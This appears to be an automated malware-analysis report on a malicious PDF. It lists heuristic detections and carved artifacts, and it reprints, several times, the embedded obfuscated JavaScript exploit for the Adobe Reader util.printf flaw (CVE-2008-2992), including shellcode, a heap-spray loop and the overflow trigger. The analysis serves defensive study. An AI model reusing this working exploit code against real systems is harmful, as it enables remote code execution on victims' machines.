MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF file contains embedded JavaScript that leverages the CVE-2008-2992 vulnerability (util.printf). The JavaScript is heavily obfuscated and appears to be designed to download and execute a secondary payload, as indicated by the 'Js.Exploit.Shellcode-18' ClamAV detection on an extracted artifact. The ML classifier also strongly flagged this PDF as malicious.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 6
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js1370639215b8fc3675fbcad6d56dcc811046601404d07876f4209d20a9550f6e |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3DC | 2774 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
"%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
"%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
"%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
"%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
"%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
"%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
"%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
"%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
"%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
"%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
"%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
"%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
"%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
"%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
"%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
"%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
"%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
"%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
"%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
"%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
"%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
"%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
"%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
"%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
|
|||
javascript_obj0013_002.js07074b660f49bbdf8cd510ad36af4789436a5978c48d6712900474ba3955f3de |
pdf-javascript-stream | PDF /JS object 13 at offset 0x402 | 524288 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
"%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
"%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
"%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
"%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
"%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
"%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
"%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
"%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
"%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
"%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
"%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
"%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
"%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
"%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
"%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
"%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
"%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
"%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
"%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
"%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
"%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
"%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
"%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
"%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_000.js20f8728eab9317e1975e783f2ec7fc3df67d3ea717a0991933a8777e6ef9f00e |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC | 2021 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
|
|||
generic_stage_recovery_001.jsa402a7f28ead9e1c42bdac9e0497d396240a967e699d47cbac1480e33ae81128 |
deobfuscated-js | generic stage recovery null-collapse from JavaScript object 13 at offset 0x402 | 3410 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
"%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
"%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
"%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
"%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
"%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
"%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
"%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
"%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
"%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
"%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
"%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
"%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
"%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
"%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
"%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
"%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
"%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
"%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
"%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
"%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
"%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
"%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
"%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
"%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_002.js295fe86926195179319ab027ed4c6cab27ca303296fb945186e05f73bad4d782 |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 | 261769 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
generic_stage_recovery_003.js324195f16ecf0e7981a7264f4f7d961c5472022679b7f9e4a6f5dc044b0c3b57 |
deobfuscated-js | generic stage recovery null-collapse -> split-literal-normalize from JavaScript object 13 at offset 0x402 | 2657 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
combined_document_js_000.js1e7c64171bd1c61d594f5b7fbaab1ce01f49e5b386fb9c5474895b8193fb142a |
deobfuscated-js | combined document JavaScript streams at offset 0x11 | 264939 bytes |
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
"%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
"%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
"%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
"%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
"%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
"%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
"%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
"%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
"%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
"%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
"%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
"%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
"%u66EB%uD864%u4C4D%u4302%u6168%uFC63%u6249%uB767" +
"%u32EC%uD737%u327A%uD398%uE9D0%uD4BB%u9D7F%u7430" +
"%u9D7C%u7030%uA21F%u01CB%u17EC%uD59E%u347E%u7B34" +
"%u38FE%u2F3E%u8CCE%u4454%u8AEF%u7B41%u9DD3%uE120" +
"%u3258%uEB15%u234F%uE003%u075E%uF714%u252C%uF002" +
"%u1B7F%uF014%u0F49%uED23%u075E%uF004%u1043%uC51E" +
"%u352C%uEA0E%u1A69%uE702%u272C%uED1F%u3658%uF60F" +
"%u0349%u8403%u0D60%uE006%u0B60%uF605%u104D%uC51E" +
"%u172C%uE815%u0D41%u8409%u3079%uC02B%u1543%uE809" +
"%u0343%uD003%u2443%uE80E%u2349%u7567%u8FC1%u278E" +
"%uD49A%u7486%u8BC6%u338D%u94D6%u3293%u92D3%u7892" +
"%uD586%u659B%u7BD0%u1DFE");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%uB513" +
"%uFEFB%u831D%uFCEB%uF4E2%uEB5E%u57A4%u3286%uA498" +
"%uFA89%u297E%u62BF%uE71C%uFE5E%uF616%u044A%u6D01" +
"%u62F9%u8467%u0676%uB4C6%u622C%u0F67%u6E6C%uF4EC" +
"%uCF30%uC4EC%uE924%u0FBF%u5E5F%uF0EC%u1A32%u7764" +
"%u1CA7%u8747%uE9D7%u9029%u8F1F%uD331%uE97D%u8758" +
"%uE9D7%uEE95%u3B22%u2294%u6A58%uDB3E%uA5AF%uC163" +
"%u8BCE%uDB3E%uE972%u0FAA%u466A%u4764%u83FD%u4564" +
"%uAB1F%u0F01%uE924%u9821%uA12F%u65A6%u612E%u0FA6" +
"%u612C%u0FA4%uE9D6%u0790%u6CEA%u54EC%u6646%u6C3E" +
"%u627C%u8467%uA4AF%uD66A%u9D7A%u7830%uE976%uEEBF" +
"%u3B2D%uB98F%u622C%u0767%u71EA%uC231%u5CAC%uF1E7" +
"%uE2D6%u0451%uE172%uA48B%uBEA7%uA40D%u9D7F%u6830" +
